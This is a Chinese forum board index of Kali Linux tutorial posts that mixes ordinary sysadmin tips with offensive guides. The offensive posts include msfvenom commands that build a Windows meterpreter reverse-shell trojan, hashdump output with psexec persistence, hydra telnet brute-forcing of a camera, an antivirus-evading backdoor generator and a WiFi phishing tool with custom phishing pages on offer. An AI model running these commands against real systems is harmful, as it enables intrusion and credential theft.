Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
405个主题在此版块
-
- 0 篇回复
- 103 次查看
一:简介一个简单的工具来生成后门和简单的工具来开发攻击像浏览器攻击,dll。这个工具编译与流行的恶意软件的有效载荷,然后可以执行编译的恶意软件在windows上,android,mac。使用此工具创建的恶意软件也有一个能力绕过大部分杀毒软件保护。 安装git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh视频演示 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/252.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 138 次查看
dsniffdsniff 是一个密码侦测工具,他能够自动分析端口上收到的某些协议的数据包,并获取相应的密码。 dnisff 支持的协议有 FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL。 dsniff 使用dsniff [-c] [-d] [-m] [-n] [expression] 注意:这里所有的 expression 都是代表 TCPDUMP 的表达式,指定对哪些数 据包进行攻击 urlsnarfurlsnarf可以嗅探 HTTP 请求报文的内容,并以 CLF (Common Log Format)通用日志格式 输出 使用 urlsnarf[-n] [-i interface] [[-v] pattern[expression]] webspywebspy 指定一个要嗅探的主机,如果指定主机发送 HTTP 请求,打开网页,webspy 也会通 过 netscape 浏览…
Ken1Ve的最后回复, -
- 0 篇回复
- 130 次查看
前言平时自己比较赖,论坛和博客平时都需要维护。比如数据库备份,那么在平时的工作中怎么高效的完成数据库备份任务呢? 废话不在多说,上源码。 源码#! /bin/ sj=`date +%Y%m%d%H%M%S` read -p "要备份的数据库名:" sql mysqldump -u root -p $sql >/root/bf/数据库$sql备份`date +%Y%m%d%H%M%S`.sql echo "备份时间:$sj" >> /root/bf/log.txt。 echo "恭喜!数据库以备份"使用说明先在root目录下新建个bf文件夹将文件保存为sql.sh给脚本给与权限chmod -R 777 sql.sh终端命令./sql.sh输入要备份的数据库名称即可开始备份log.txt用来记录备份的日志。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/256.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 139 次查看
linux删除文件夹命令 在用Linux的时分,有时分要删除一个文件夹,常常会提示次此文件非空,没法删除,这个时候,必需运用rm -rf命令。关于一些小白用户常常在运用Linux命令,会十分当心,以免搞出一些事情,下面小编将教细致教大家如何运用linux命令删除文件夹,需求的请珍藏。 linux删除文件夹命令 linux删除文件夹命令实例: rm -rf /var/log/httpd/access将会删除/var/log/httpd/access目录以及其下所有文件、文件夹 linux删除文件夹命令 linux删除文件命令实例: rm -f /var/log/httpd/access.log将会强制删除/var/log/httpd/access.log这个文件 -r 是向下递归,不管有多少级目录,一并删除 -f 是直接强行删除,不作任何提示的意思 -i 进行交互式删除。 提示:运用rm命令要当心。由于一旦文件被删除,它是不能被恢复的。了避免这种状况的发作,能够运用i选项来逐一确认要删除的文件。假如用户输入y,文件将被删除。假如输入任何其他东西,文件则不会删除。 运用这个rm -rf删除文件的时分一定要格外当心,linux没有回收站的。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/260.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
前不久刚入手魅族路由器一台,今天让我们从其外观,功能等方面进行一次简单的测评。说说快递,顺丰快递。下单后两天就到货,很快! 恩,开箱(双手已饥渴难耐) 包装还可以…… 爆爆菊花 支持USB接口,两个wlan口,支持充电宝供电(适合没电的时候用) 插入网线,进行配置 配置过程可以在浏览器中输入192.168.232.1或者下载APP直接配置。 APP首页 插件列表 里面插件比较多,我就不再一一的说明 了。这里给大家演示下迅雷下载加速插件。 在正常情况下,(没有迅雷会员)下载速度 基本在2M左右,这个只是一个简单的测评,没有那么专业。只是和平时的下载速度相比较。 在接口处 插入U盘或者移动硬盘,我们可以查看U盘中的文件。当然也可以将远程文件下载到我们的U盘中。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/261.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
代码<!--富强--> <script type="text/javascript"> /* 鼠标特效 */ var a_idx = 0; jQuery(document).ready(function($) { $("body").click(function(e) { var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善"); var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length; var x = e.pageX, y = e.pageY; $i.css({ "z-index": 999, "top": y - 20, "left": x, "position": "absolute", "font-weight": "bold", "color": "#ff6651" }); $("body").append($i); $i.animate({ …
Ken1Ve的最后回复, -
第一课 青春的邀约1. 青春期身体变化的主要表现:身体外形的变化,内部器官的完善,性机能的成熟。 2.青春期身体发育情况各不相同的原因及应有的态度 原因:受遗传、营养、锻炼等因素的影响,我们身体的发育情况各不相同。 态度:①我们要正视身体的变化,欣然接受青春花蕾的绽放。②不因自己的生理变化而自卑,是我们对自己的尊重;不嘲弄同伴的生理变化,是我们对同伴的尊重。 调节青春期的矛盾心理的方法: ①参加集体活动,在集体的温暖中放松自己。②通过求助他人,学习化解烦恼的方法。③培养兴趣爱好转移注意力,接纳和调适青春期的矛盾心理。④学习自我调节,成为自己的“心理保健医生” 。 4. 自我调节的方法:①把自己的想法写下来;②参加体育活动;③学习自我暗示;④试试自我解嘲。 5.怎样正确认识思维的独立性 ( 思维的独立要求我们如何做 )? 思维的独立并不等同于一味追求独特,而是意味着不人云亦云,有自己独到的见解,同时接纳他人合理、正确的意见。 6.培养批判精神的作用 ( 意义 ) 和方法 作用 ( 意义 ) :①有助于我们发现问题、提出问题,并从不同角度去思考问题,探索解决方案; ②能调动我们的经验,激发我们新的学习动机,促使我们解决问题,改进现状。 方法:①要有质疑的勇气,有表达自己观点、提出合理化建议的能力; ②要考虑他人的感受,知道怎样的批判更容易被人接受,更有利于解决问题。 7.开发创造潜力的方法: ①青春韶华,我们要争当勤奋学习、自觉劳动、勇于创造的好少年,这是时代的要求。②敢于打破常规,追求生活的新奇与浪漫,开创前人未走之路;关注他人与社会…
Ken1Ve的最后回复, -
- 0 篇回复
- 131 次查看
解决方法1、/usr/sbin/sestatus -v ##如果SELinux status参数为enabled即为开启状态 SELinux status: enabled 2、getenforce ##也可以用这个命令检查 关闭SELinux: 3、临时关闭(不用重启机器): setenforce 0 ##设置SELinux 成为permissive模式 4、临时开启(不用重启机器): setenforce 1 ##设置SELinux 成为enforcing模式 5、修改配置文件需要重启机器: 修改/etc/selinux/config 文件 将SELINUX=enforcing改为SELINUX=disabled 重启机器即可 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/275.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 143 次查看
1.0 更改系统 apt 源Ubuntu 的软件源配置文件是 /etc/apt/sources.list 文件中。 可以将其更改为国内的软件源,例如: 清华大学开源软件镜像站 中科大开源软件镜像站 1.1 备份 sources.list 并更改:备份原来的源cp /etc/apt/sources.list /etc/apt/sources.list.back编辑源。删除打开的文件中所有行,替换为上述网站中获取到源 vi /etc/apt/sources.list(不会用 vi 的自行搜索) 1.2 更新软件列表 和 软件包#更新软件列表 sudo apt update #更新软件包 sudo apt upgrade2.0 创建 python 环境2.1 安装pip、虚虚拟环境、方便管理虚拟环境的插件 为 python 安装pip pip install python-pip安装虚拟环境 virtualenv pip install virtualenv便于管理虚拟环境的一个插件 pip install virtualenvwrapper多说一句 Windows 下的 virtualenvwrapper 为 virtualenvwrapper-win 2.2 为插件创建环境变量。二选一即可编辑当前用户的环境变量:vi ~/. rc 编辑系统环境变量:sudo vi /etc/profile 打开环境变量文件后,在底部增加如下行: export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HO…
Ken1Ve的最后回复, -
- 0 篇回复
- 133 次查看
Synergy是一款跨平台的键盘鼠标共享软件,现在有Synergy 和Synergy 64位的Win版本、Synergy Mac版,Synergy 能够让使用者仅用一套键盘鼠标,就同时操控多部计算机的免费工具软件。使用者能够在包括 Windows 、 Linux 、 Mac OS 等不同的系统上安装它,并且在设定好主从关系后,就能够透过一组键盘鼠标来进行多部计算机的操控。 注意事项电脑需要在同一个局域网之下每一台电脑都要安装Synergy软件鼠标和键盘所在的电脑设置为 Service 端,其余设置为 client 端 WIN下设置1、选中server(就是服务器,共享鼠标和键盘) 2、configure interactively-configure server,加上要连接的电脑(mac,名字可以从mac的共享里看到),本机(也就是xp)已经自动加进去了,如果没加就自己手工加上,电脑名字是在(我的电脑-右键-属性-计算机名-完整的计算机名称),然后调整电脑的摆放位置即可,一共有15个格子,能加15台电脑,当监视器也差不多了 3、双击电脑图表,可以设置dead corners(死角,不会让鼠标乱飞,如:服务器右边没电脑的,就把鼠标的死角设置为top-right右上&bottom-right右下) 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/280.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 122 次查看
这几天论坛里面的小伙伴发了些linux下的一些命令,这里我做简单的归纳!在linux显示日历所用命令cal 使用: 显示2018年的日历 cal -y 2018 在linux显示天气预报所用命令wttr.in wttr.in是一个在线网站,根据ip地位将本地的天气预报已字符串的形式显示。 命令: curl wttr.inv 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/282.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 131 次查看
源码<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>bbs统计系统</title> <!--数据库--> <?php $servername = "localhost"; $username = "root"; $password = "123456"; $dbname = "tj"; // 创建连接 $conn = mysqli_connect($servername, $username, $password, $dbname); // Check connection if (!$conn) { die("连接失败: " . mysqli_connect_error()); } $sql = "SELECT * FROM sj"; $result = mysqli_query($conn, $sql); $result = mysqli_query($conn, $sql); if…
Ken1Ve的最后回复, -
- 0 篇回复
- 130 次查看
由于自学python3,需要在服务器上调试python程序。在centos中,自带有python2,因此需要经常安装python3。但是这里有一个坑,就是centos的yum是用python2写的,如果正常编译安装python3,那么yum就会直接挂了。为了方便以后编译安装python3,不用天天去网上找教程,准备写下这篇文章,供日后参考。首先连上服务器,看下python版本:python -V如图我们可以看到centos下,默认带有python2.7.5: 接下来我们开始安装python3。1 安装python3所需要的组件 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel 2 备份现有的python2 cd /usr/bin mv python python.bak mv pip pip.bak3 下载并编译安装python3这篇文章我们选择最新的稳定版本3.6.5,如有更新可以自行去官网(https://www.python.org/downloads/source/)查找下载地址。 cd ~ && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz tar -xvJf Python-3.6.5.tar.xz cd Python-3.6.5 指定安装路径 ./configure pr…
Ken1Ve的最后回复, -
- 0 篇回复
- 120 次查看
一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
介绍NIKTO:perl语言开发的开源WEB安全扫描器;识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查WEB Application层面的安全隐患;避免404误判依据响应文件内容判断,不同扩展名的文件404响应内容不同。命令列表root@kali:~#nikto -h Option host requires an argument -config+ Use this config file -Display+ Turn on/off display outputs -dbcheck check database and other key files for syntax errors -Format+ save file (-o) format -Help Extended help information -host+ target host -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -output+ Write …
Ken1Ve的最后回复, -
文件找不到了,Windows上,大家习惯了右上角直接搜索,分分钟就找回来了,但这样操作真的安全吗? 反正,这样的“便宜”事就别想对Linux做了。 其实,Linux上的文件查找也并不难啦,而且安全性十足哒(特别花样多,比格高),就小小的find的就能做到。find的用法(绝对core)基本格式:find 搜索范围 搜索条件 搜索内容 白话解:就是find空格后面加你想要搜索的目录(/xxx),再空格后面加上搜索条件(下面吾慢慢讲到),再空格内容就OK啦。 例: find /tmp -name linux.list (查询tmp目录下linux.list文件) 按用户创建来查找例:查询lamp用户在tmp目录下创建的文件。 find /tmp -user lamp按文件大小例:查询tmp目录下大于100MB的文件或小于10MB的文件 find /tmp -size +204800 或find /tmp -size -20480科普:size是代码块,一个数据块 = 512字节=0.5k 1k=1024字节 1m=1024k 区间查找:把两个例子组合起来,find /tmp -size +20480 && -size -204800按时间查找查询10分钟之前访问的文件find /tmp -amin -10(注:a:access的简写 min:minute)查询10分钟之内修改的文件 find /tmp -mmin -10(注:m:modify的简写 min:minute)查询10分钟之内属性被修改的文件 find …
Ken1Ve的最后回复, -
- 0 篇回复
- 145 次查看
获取管理员hash获得shell后,执行命令 getsystem提高权限为管理员权限,接着执行命令 run post/windows/gather/hashdump获取hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e::: 权限维持执行命令 use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 443 set RHOST 192.168.232.204 set SMBUser Administrator show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.232.204 yes The target address RPORT 445 yes The SMB service …
Ken1Ve的最后回复, -
- 0 篇回复
- 146 次查看
前言发现一款摄像头,抱着好奇的心态,开始了漫长的渗透之路。 扫描目标及端口扫描目标: nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备,我们对此ip进行端口扫描 端口扫描: nmap -T4 -A 192.168.6.102 效果如下: 我们可以看到,当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件,嗯……懒得安装,接着来 既然开启了21和23端口,这说明存在ftp和telnet服务,我们尝试弱口令登录。 然而,并没有卵用。 尝试暴力破解新建一个my.txt字典,尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩,还是没结果,别放弃,接着来! 在扫描端口的时候,发现存在30000端口,恩,这是什么鬼,看看! 浏览器访问30000端口 出现一串神秘的字符,等等,这串字符是不是设备的ID呢?带着这个设想,我下载了他们产品的APP 如图,输入设备id,账号和密码默认! 点击保存,激动人心的提示保存成功。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 139 次查看
软件介绍fluxon是kali下的一款wifi钓鱼工具。通过钓鱼的方式获得对方WiFi密码。 视频演示 备注需要其他页面的,可以私聊管理员!也可以定做各种页面。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/312.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复,